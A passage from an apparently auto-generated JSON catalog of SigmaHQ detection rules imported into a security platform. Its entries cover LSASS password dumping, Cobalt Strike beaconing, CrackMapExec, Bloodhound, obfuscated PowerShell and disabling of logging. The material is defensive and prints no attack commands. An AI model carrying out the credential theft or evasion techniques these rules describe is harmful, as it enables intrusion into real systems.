"detections/sigma-imports/_quarantine/ntfs-vulnerability-exploitation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f14719ce-d3ab-4e25-9ce6-2899092260b0", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/system/ntfs/win_system_ntfs_vuln_exploit.yml" } }, { "id": "sigmahq-sigma-f14e169e-9978-4c69-acb3-1cff8200bc36", "type": "detection", "name": "Suspicious GrpConv Execution", "description": "Detects the suspicious execution of a utility to convert Windows 3.x .grp files or for persistence purposes by malicious software or actors", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1547" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-grpconv-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f14e169e-9978-4c69-acb3-1cff8200bc36", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_lolbin_susp_grpconv.yml" } }, { "id": "sigmahq-sigma-f17211f1-1f24-4d0c-829f-31e28dc93cdd", "type": "detection", "name": "Uncommon Svchost Command Line Parameter", "description": "Detects instances of svchost.exe running with an unusual or uncommon command line parameter by excluding known legitimate or common patterns.\nThis could point at a file masquerading as svchost, a process injection, or hollowing of a legitimate svchost instance.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1036.005", "T1055", "T1055.012" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/uncommon-svchost-command-line-parameter.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f17211f1-1f24-4d0c-829f-31e28dc93cdd", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_svchost_uncommon_command_line_flags.yml" } }, { "id": "sigmahq-sigma-f177f2bc-5f3e-4453-b599-57eefce9a59c", "type": "detection", "name": "Remote Schedule Task Recon via AtScv", "description": "Detects remote RPC calls to read information about scheduled tasks via AtScv", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/remote-schedule-task-recon-via-atscv.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f177f2bc-5f3e-4453-b599-57eefce9a59c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/application/rpc_firewall/rpc_firewall_atsvc_recon.yml" } }, { "id": "sigmahq-sigma-f1b3a22a-45e6-4004-afb5-4291f9c21166", "type": "detection", "name": "Suspicious PsExec Execution - Zeek", "description": "detects execution of psexec or paexec with renamed service name, this rule helps to filter out the noise if psexec is used for legit purposes or if attacker uses a different psexec client other than sysinternal one", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1021.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-psexec-execution-zeek.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f1b3a22a-45e6-4004-afb5-4291f9c21166", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/network/zeek/zeek_smb_converted_win_susp_psexec.yml" } }, { "id": "sigmahq-sigma-f1edd233-30b5-4823-9e6a-c4171b24d316", "type": "detection", "name": "Rundll32 Registered COM Objects", "description": "load malicious registered COM objects", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1546.015" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/rundll32-registered-com-objects.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f1edd233-30b5-4823-9e6a-c4171b24d316", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_rundll32_registered_com_objects.yml" } }, { "id": "sigmahq-sigma-f1f3bf22-deb2-418d-8cce-e1a45e46a5bd", "type": "detection", "name": "MMC20 Lateral Movement", "description": "Detects MMC20.Application Lateral Movement; specifically looks for the spawning of the parent MMC.exe with a command line of \"-Embedding\" as a child of svchost.exe", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1021.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/mmc20-lateral-movement.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f1f3bf22-deb2-418d-8cce-e1a45e46a5bd", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_mmc_mmc20_lateral_movement.yml" } }, { "id": "sigmahq-sigma-f200dc3f-b219-425d-a17e-c38467364816", "type": "detection", "name": "Clipboard Collection of Image Data with Xclip Tool", "description": "Detects attempts to collect image data stored in the clipboard from users with the usage of xclip tool.\nXclip has to be installed.\nHighly recommended using rule on servers, due to high usage of clipboard utilities on user workstations.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1115" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/clipboard-collection-of-image-data-with-xclip-tool.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f200dc3f-b219-425d-a17e-c38467364816", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/auditd/execve/lnx_auditd_clipboard_image_collection.yml" } }, { "id": "sigmahq-sigma-f208d6d8-d83a-4c2c-960d-877c37da84e5", "type": "detection", "name": "Process Launched Without Image Name", "description": "Detect the use of processes with no name (\".exe\"), which can be used to evade Image-based detections.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/process-launched-without-image-name.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f208d6d8-d83a-4c2c-960d-877c37da84e5", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_susp_no_image_name.yml" } }, { "id": "sigmahq-sigma-f239b326-2f41-4d6b-9dfa-c846a60ef505", "type": "detection", "name": "Password Dumper Remote Thread in LSASS", "description": "Detects password dumper activity by monitoring remote thread creation EventID 8 in combination with the lsass.exe process as TargetImage.\nThe process in field Process is the malicious program. A single execution can lead to hundreds of events.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1003.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": true, "path": "detections/sigma-imports/endpoint/password-dumper-remote-thread-in-lsass.yaml", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f239b326-2f41-4d6b-9dfa-c846a60ef505", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/create_remote_thread/create_remote_thread_win_susp_password_dumper_lsass.yml" } }, { "id": "sigmahq-sigma-f241cf1b-3a6b-4e1a-b4f9-133c00dd95ca", "type": "detection", "name": "Invoke-Obfuscation RUNDLL LAUNCHER - Security", "description": "Detects Obfuscated Powershell via RUNDLL LAUNCHER", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1027", "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/invoke-obfuscation-rundll-launcher-security.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f241cf1b-3a6b-4e1a-b4f9-133c00dd95ca", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_invoke_obfuscation_via_rundll_services_security.yml" } }, { "id": "sigmahq-sigma-f2485272-a156-4773-82d7-1d178bc4905b", "type": "detection", "name": "Suspicious Service Installed", "description": "Detects installation of NalDrv or PROCEXP152 services via registry-keys to non-system32 folders.\nBoth services are used in the tool Ghost-In-The-Logs (https://github.com/bats3c/Ghost-In-The-Logs), which uses KDU (https://github.com/hfiref0x/KDU)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-service-installed.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f2485272-a156-4773-82d7-1d178bc4905b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_susp_service_installed.yml" } }, { "id": "sigmahq-sigma-f24ab7a8-f09a-4319-82c1-915586aa642b", "type": "detection", "name": "FortiGate - New Firewall Policy Added", "description": "Detects the addition of a new firewall policy on a Fortinet FortiGate Firewall.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/fortigate-new-firewall-policy-added.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f24ab7a8-f09a-4319-82c1-915586aa642b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/network/fortinet/fortigate/fortinet_fortigate_new_firewall_policy_added.yml" } }, { "id": "sigmahq-sigma-f24bcaea-0cd1-11eb-adc1-0242ac120002", "type": "detection", "name": "Uncommon Assistive Technology Applications Execution Via AtBroker.EXE", "description": "Detects the start of a non built-in assistive technology applications via \"Atbroker.EXE\".", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/uncommon-assistive-technology-applications-execution-via-atbroker-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f24bcaea-0cd1-11eb-adc1-0242ac120002", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_atbroker_uncommon_ats_execution.yml" } }, { "id": "sigmahq-sigma-f26307d8-14cd-47e3-a26b-4b4769f24af6", "type": "detection", "name": "HackTool - CrackMapExec Process Patterns", "description": "Detects suspicious process patterns found in logs when CrackMapExec is used", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1003.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hacktool-crackmapexec-process-patterns.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f26307d8-14cd-47e3-a26b-4b4769f24af6", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_hktl_crackmapexec_patterns.yml" } }, { "id": "sigmahq-sigma-f26c6093-6f14-4b12-800f-0fcb46f5ffd0", "type": "detection", "name": "Malicious Base64 Encoded PowerShell Keywords in Command Lines", "description": "Detects base64 encoded strings used in hidden malicious PowerShell command lines", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/malicious-base64-encoded-powershell-keywords-in-command-lines.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f26c6093-6f14-4b12-800f-0fcb46f5ffd0", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_powershell_base64_hidden_flag.yml" } }, { "id": "sigmahq-sigma-f26eb764-fd89-464b-85e2-dc4a8e6e77b8", "type": "detection", "name": "Suspicious Electron Application Child Processes", "description": "Detects suspicious child processes of electron apps (teams, discord, slack, etc.). This could be a potential sign of \".asar\" file tampering (See reference section for more information) or binary execution proxy through specific CLI arguments (see related rule)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-electron-application-child-processes.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f26eb764-fd89-464b-85e2-dc4a8e6e77b8", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_susp_electron_app_children.yml" } }, { "id": "sigmahq-sigma-f272fb46-25f2-422c-b667-45837994980f", "type": "detection", "name": "Authentications To Important Apps Using Single Factor Authentication", "description": "Detect when authentications to important application(s) only required single-factor authentication", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1078" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/authentications-to-important-apps-using-single-factor-authentication.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f272fb46-25f2-422c-b667-45837994980f", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/signin_logs/azure_ad_auth_to_important_apps_using_single_factor_auth.yml" } }, { "id": "sigmahq-sigma-f2bed782-994e-4f40-9cd5-518198cb3fba", "type": "detection", "name": "Linux Sudo Chroot Execution", "description": "Detects the execution of 'sudo' command with '--chroot' option, which is used to change the root directory for command execution.\nAttackers may use this technique to evade detection and execute commands in a modified environment.\nThis can be part of a privilege escalation strategy, as it allows the execution of commands with elevated privileges in a controlled environment as seen in CVE-2025-32463.\nWhile investigating, look out for unusual or unexpected use of 'sudo --chroot' in conjunction with other commands or scripts such as execution from temporary directories or unusual user accounts.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1068" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/linux-sudo-chroot-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f2bed782-994e-4f40-9cd5-518198cb3fba", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_chroot_execution.yml" } }, { "id": "sigmahq-sigma-f2c64357-b1d2-41b7-849f-34d2682c0fad", "type": "detection", "name": "Suspicious Command Patterns In Scheduled Task Creation", "description": "Detects scheduled task creation using \"schtasks\" that contain potentially suspicious or uncommon commands", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1053.005" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-command-patterns-in-scheduled-task-creation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f2c64357-b1d2-41b7-849f-34d2682c0fad", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_schtasks_susp_pattern.yml" } }, { "id": "sigmahq-sigma-f305fd62-beca-47da-ad95-7690a0620084", "type": "detection", "name": "Potential Bucket Enumeration on AWS", "description": "Looks for potential enumeration of AWS buckets via ListBuckets.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1580", "T1619" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-bucket-enumeration-on-aws.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f305fd62-beca-47da-ad95-7690a0620084", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/aws/cloudtrail/aws_enum_buckets.yml" } }, { "id": "sigmahq-sigma-f318b911-ea88-43f4-9281-0de23ede628e", "type": "detection", "name": "PUA - CSExec Default Named Pipe", "description": "Detects default CSExec pipe creation", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1021.002", "T1569.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/pua-csexec-default-named-pipe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f318b911-ea88-43f4-9281-0de23ede628e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/pipe_created/pipe_created_pua_csexec_default_pipe.yml" } }, { "id": "sigmahq-sigma-f331aa1f-8c53-4fc3-b083-cc159bc971cb", "type": "detection", "name": "Malicious PowerShell Scripts - FileCreation", "description": "Detects the creation of known offensive powershell scripts used for exploitation", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/malicious-powershell-scripts-filecreation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f331aa1f-8c53-4fc3-b083-cc159bc971cb", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_powershell_exploit_scripts.yml" } }, { "id": "sigmahq-sigma-f34047d9-20d3-4e8b-8672-0a35cc50dc71", "type": "detection", "name": "System Information Discovery - Auditd", "description": "Detects System Information Discovery commands", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1082" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/system-information-discovery-auditd.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f34047d9-20d3-4e8b-8672-0a35cc50dc71", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/auditd/lnx_auditd_system_info_discovery.yml" } }, { "id": "sigmahq-sigma-f346bbd5-2c4e-4789-a221-72de7685090d", "type": "detection", "name": "Google Cloud SQL Database Modified or Deleted", "description": "Detect when a Cloud SQL DB has been modified or deleted.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/google-cloud-sql-database-modified-or-deleted.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f346bbd5-2c4e-4789-a221-72de7685090d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/gcp/audit/gcp_sql_database_modified_or_deleted.yml" } }, { "id": "sigmahq-sigma-f354eba5-623b-450f-b073-0b5b2773b6aa", "type": "detection", "name": "Potential DCOM InternetExplorer.Application DLL Hijack - Image Load", "description": "Detects potential DLL hijack of \"iertutil.dll\" found in the DCOM InternetExplorer.Application Class", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "critical", "category": "_quarantine", "mitre_techniques": [ "T1021.002", "T1021.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-dcom-internetexplorer-application-dll-hijack-image-load.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f354eba5-623b-450f-b073-0b5b2773b6aa", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/image_load/image_load_iexplore_dcom_iertutil_dll_hijack.yml" } }, { "id": "sigmahq-sigma-f356a9c4-effd-4608-bbf8-408afd5cd006", "type": "detection", "name": "Suspicious Cobalt Strike DNS Beaconing - Sysmon", "description": "Detects a program that invoked suspicious DNS queries known from Cobalt Strike beacons", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "critical", "category": "_quarantine", "mitre_techniques": [ "T1071.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-cobalt-strike-dns-beaconing-sysmon.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f356a9c4-effd-4608-bbf8-408afd5cd006", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/dns_query/dns_query_win_mal_cobaltstrike.yml" } }, { "id": "sigmahq-sigma-f35c5d71-b489-4e22-a115-f003df287317", "type": "detection", "name": "Potential CobaltStrike Process Patterns", "description": "Detects potential process patterns related to Cobalt Strike beacon activity", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1059" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-cobaltstrike-process-patterns.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f35c5d71-b489-4e22-a115-f003df287317", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_hktl_cobaltstrike_process_patterns.yml" } }, { "id": "sigmahq-sigma-f376c8a7-a2d0-4ddc-aa0c-16c17236d962", "type": "detection", "name": "HackTool - Bloodhound/Sharphound Execution", "description": "Detects command line parameters used by Bloodhound and Sharphound hack tools", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1087.001", "T1087.002", "T1482", "T1069.001", "T1069.002", "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hacktool-bloodhound-sharphound-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f376c8a7-a2d0-4ddc-aa0c-16c17236d962", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_hktl_bloodhound_sharphound.yml" } }, { "id": "sigmahq-sigma-f37aba28-a9e6-4045-882c-d5004043b337", "type": "detection", "name": "Potential Arbitrary File Download Via Cmdl32.EXE", "description": "Detects execution of Cmdl32 with the \"/vpn\" and \"/lan\" flags.\nAttackers can abuse this utility in order to download arbitrary files via a configuration file.\nInspect the location and the content of the file passed as an argument in order to determine if it is suspicious.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218", "T1202" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-arbitrary-file-download-via-cmdl32-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f37aba28-a9e6-4045-882c-d5004043b337", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_cmdl32_arbitrary_file_download.yml" } }, { "id": "sigmahq-sigma-f37b4bce-49d0-4087-9f5b-58bffda77316", "type": "detection", "name": "Potential AutoLogger Sessions Tampering", "description": "Detects tampering with autologger trace sessions which is a technique used by attackers to disable logging.\nThe AutoLogger event tracing session records events up that occur early in the operating system boot process.\nApplications and device drivers can use the AutoLogger session to capture traces before the user logs in, and also used by security solutions as telemetry source.\nAdversaries may disable these sessions to evade detection and prevent security monitoring of early boot activities and system events.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1685.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-autologger-sessions-tampering.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f37b4bce-49d0-4087-9f5b-58bffda77316", "source_commit": 